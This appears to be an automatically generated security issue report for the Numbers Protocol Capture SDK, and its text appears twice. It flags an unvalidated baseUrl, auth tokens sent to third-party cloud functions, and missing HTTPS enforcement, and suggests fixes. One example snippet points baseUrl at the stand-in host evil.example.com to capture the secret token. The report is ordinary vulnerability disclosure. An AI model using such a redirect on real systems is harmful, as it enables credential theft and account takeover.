Summary
The SDK has two high-severity security gaps related to credential exfiltration:
1. Unrestricted baseUrl Override (TypeScript)
Files: ts/src/client.ts:152, ts/src/types.ts:20
The CaptureOptions.baseUrl accepts any URL with no validation. If an application's configuration is compromised (env var injection, config file tampering, supply chain attack), an attacker can redirect all authenticated requests — including the Authorization header — to a server they control:
const capture = new Capture({
token: 'real-secret-token',
baseUrl: 'https://evil.example.com/api/v3'
})Suggested fix: Validate that baseUrl matches an allowlist of *.numbersprotocol.io domains, or at minimum log a warning when a non-standard URL is used. Apply the same check in the Python SDK's base_url parameter.
2. Auth Token Sent to AWS Lambda and GCP Cloud Functions (Both SDKs)
Files:
ts/src/client.ts:374-379 (getHistory → AWS Lambda)ts/src/client.ts:430-436 (getAssetTree → GCP Cloud Function)ts/src/client.ts:520-526 (searchAsset → GCP Cloud Function)python/numbersprotocol_capture/client.py:448-455 (get_history → AWS Lambda)python/numbersprotocol_capture/client.py:514-524 (get_asset_tree → GCP Cloud Function)python/numbersprotocol_capture/client.py:678-693 (search_asset → GCP Cloud Function)
Issue #10 tracks token leakage to the Pipedream NFT search endpoint. However, the same Authorization: token <secret> header is also sent to three additional distinct third-party domains:
e23hi68y55.execute-api.us-east-1.amazonaws.com (AWS Lambda)us-central1-numbers-protocol-api.cloudfunctions.net (GCP Cloud Functions × 2)
If any of these services is compromised or DNS-hijacked, the user's primary API token is exposed. The AWS API Gateway URL appears auto-generated and could theoretically be re-registered if deleted.
Suggested fix:
- Evaluate whether each endpoint actually requires the Capture API token.
- Use per-endpoint scoped tokens rather than forwarding the primary API token.
- At minimum, proxy all calls through
api.numbersprotocol.io to avoid token fan-out.
3. No HTTPS Enforcement on Python base_url
File: python/numbersprotocol_capture/client.py:158-159
The Python SDK's base_url parameter accepts http:// URLs, which would transmit the auth token in plaintext.
Suggested fix: Validate that base_url starts with https://.
Impact: Token exfiltration enables full account takeover. An attacker gaining access to the primary API token can register, modify, and access all digital assets on behalf of the user.
Generated by Health Monitor with Omni
Summary
The SDK has two high-severity security gaps related to credential exfiltration:
1. Unrestricted
baseUrlOverride (TypeScript)Files:
ts/src/client.ts:152,ts/src/types.ts:20The
CaptureOptions.baseUrlaccepts any URL with no validation. If an application's configuration is compromised (env var injection, config file tampering, supply chain attack), an attacker can redirect all authenticated requests — including theAuthorizationheader — to a server they control:Suggested fix: Validate that
baseUrlmatches an allowlist of*.numbersprotocol.iodomains, or at minimum log a warning when a non-standard URL is used. Apply the same check in the Python SDK'sbase_urlparameter.2. Auth Token Sent to AWS Lambda and GCP Cloud Functions (Both SDKs)
Files:
ts/src/client.ts:374-379(getHistory → AWS Lambda)ts/src/client.ts:430-436(getAssetTree → GCP Cloud Function)ts/src/client.ts:520-526(searchAsset → GCP Cloud Function)python/numbersprotocol_capture/client.py:448-455(get_history → AWS Lambda)python/numbersprotocol_capture/client.py:514-524(get_asset_tree → GCP Cloud Function)python/numbersprotocol_capture/client.py:678-693(search_asset → GCP Cloud Function)Issue #10 tracks token leakage to the Pipedream NFT search endpoint. However, the same
Authorization: token <secret>header is also sent to three additional distinct third-party domains:e23hi68y55.execute-api.us-east-1.amazonaws.com(AWS Lambda)us-central1-numbers-protocol-api.cloudfunctions.net(GCP Cloud Functions × 2)If any of these services is compromised or DNS-hijacked, the user's primary API token is exposed. The AWS API Gateway URL appears auto-generated and could theoretically be re-registered if deleted.
Suggested fix:
api.numbersprotocol.ioto avoid token fan-out.3. No HTTPS Enforcement on Python
base_urlFile:
python/numbersprotocol_capture/client.py:158-159The Python SDK's
base_urlparameter acceptshttp://URLs, which would transmit the auth token in plaintext.Suggested fix: Validate that
base_urlstarts withhttps://.Impact: Token exfiltration enables full account takeover. An attacker gaining access to the primary API token can register, modify, and access all digital assets on behalf of the user.
Generated by Health Monitor with Omni